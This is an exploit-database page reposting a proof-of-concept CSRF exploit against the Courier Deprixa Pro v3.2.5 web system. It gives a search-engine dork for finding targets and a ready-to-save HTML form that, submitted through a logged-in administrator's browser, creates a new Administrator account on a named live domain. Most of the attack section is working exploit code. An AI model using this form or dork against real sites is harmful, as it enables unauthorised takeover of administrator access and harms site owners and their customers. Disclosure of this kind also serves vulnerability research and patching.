Advertisement






Courier Deprixa Pro - Integrated Web System v3.2.5 CSRF Vulnerability

CVE Category Price Severity
N/A CWE-352 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2018-07-10
CPE
cpe:cpe:/a:courier:deprixa_pro_integrated_web_system:3.2.5
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 0 0

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070107

Below is a copy:

Courier Deprixa Pro - Integrated Web System v3.2.5 CSRF Vulnerability
====================================================================================================================================
| # Title     : Courier Deprixa Pro - Integrated Web System v3.2.5 CSRF Vulnerability                                              |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro)                                                                                        |
| # Vendor    : https://codecanyon.net/item/courier-deprixa-pro-integrated-web-system-v32/15216982                                 |  
| # Dork      : DEPRIXA 3.2.5 | lOGIN                                                                                              |
====================================================================================================================================


poc :

[+] Dorking n Google Or Other Search Enggine 

[+] Save Code as HT.html

<div class="modal-content">
  <div class="modal-header">
<h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i>New Administrator</h4>
  </div>
  <div class="modal-body">
  <!--Cuerpo del modal aqu el formulario-->
<form action="https://bluedotcourrier.com/dashboard/settings/addusersadmin/agregar.php" data-parsley-validate="" novalidate="" method="post" class="form-horizontal" enctype="multipart/form-data">
  <div class="form-group " id="gnombrepa">
<label for="off_name" class="col-sm-2 control-label"></label>
<div class="col-sm-10">
  <input class="form-control off_name" parsley-trigger="change" required="" name="name_parson" placeholder="Administrator Name" data-parsley-id="4" type="text">
</div>
  </div>
  <div class="form-group" id="gapellido">
<label for="email" class="col-sm-2 control-label">Email</label>
<div class="col-sm-5">
  <input class="form-control email" name="email" id="id_mail" placeholder="[email protected]" required="" onkeyup="javascript:validateMail('id_mail')" data-parsley-id="6" type="text">
  <strong><span id="emailOK"></span></strong>
<p class="error"></p>
</div>
<div class="col-sm-5">
  <input class="form-control phone" name="phone" parsley-trigger="change" required="" placeholder="Phone" data-parsley-id="8">  
</div>
  </div>
  <div class="form-group" id="gemail">
<label for="office" class="col-sm-2 control-label">Office</label>
<div class="col-sm-5">
  <input class="form-control office" parsley-trigger="change" required="" name="office" placeholder="Name of the Office" data-parsley-id="10" type="text">
</div>
<div class="col-sm-5">
<select type="text" class="form-control role" name="role" data-parsley-id="12">
  <option value="Administrator">Administrator</option>
</select>
</div>
  </div>
  <div class="form-group " id="gnombre">
<label for="off_name" class="col-sm-2 control-label">User</label>
<div class="col-sm-10">
  <input class="form-control off_name" parsley-trigger="change" required="" name="name" placeholder="Username" data-parsley-id="14" type="text">
</div>
  </div>
  <div class="form-group" id="gpassword">
<label for="pwd" class="col-sm-2 control-label">Password</label>
<div class="col-sm-10">
  <input class="form-control pwd" parsley-trigger="change" required="" name="pwd" placeholder="Password" data-parsley-id="16" type="text">
</div>
  </div>
  <br><br>
<div class="col-sm-offset-2 col-sm-10">
<div class="checkbox">
  <label class="i-checks i-checks-sm">
<input type="checkbox" name="estado" value="1" onclick="return false" checked >
<i></i>
State  </label>
</div>
<div class="checkbox">
  <label class="i-checks i-checks-sm">
<input type="checkbox" name="type" value="a" onclick="return false" checked >
<i></i>
User Type  </label>
</div>
</div>
  
<!--Fin del cuerpo del modal-->
</div>
 </br></br>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>
Close</button>
<input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">
</div>
</form>
</div>
  </div>
</div>
<!--fin de modal nuevo usuario-->   
</div>
<!--fin de modal nuevo usuario-->
  </div>
</div>       
  </div>
  <!-- / service -->
</div>
  </div>
  <!-- / main -->    
</div>
    </div>
  </div>
  <!-- / content -->


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum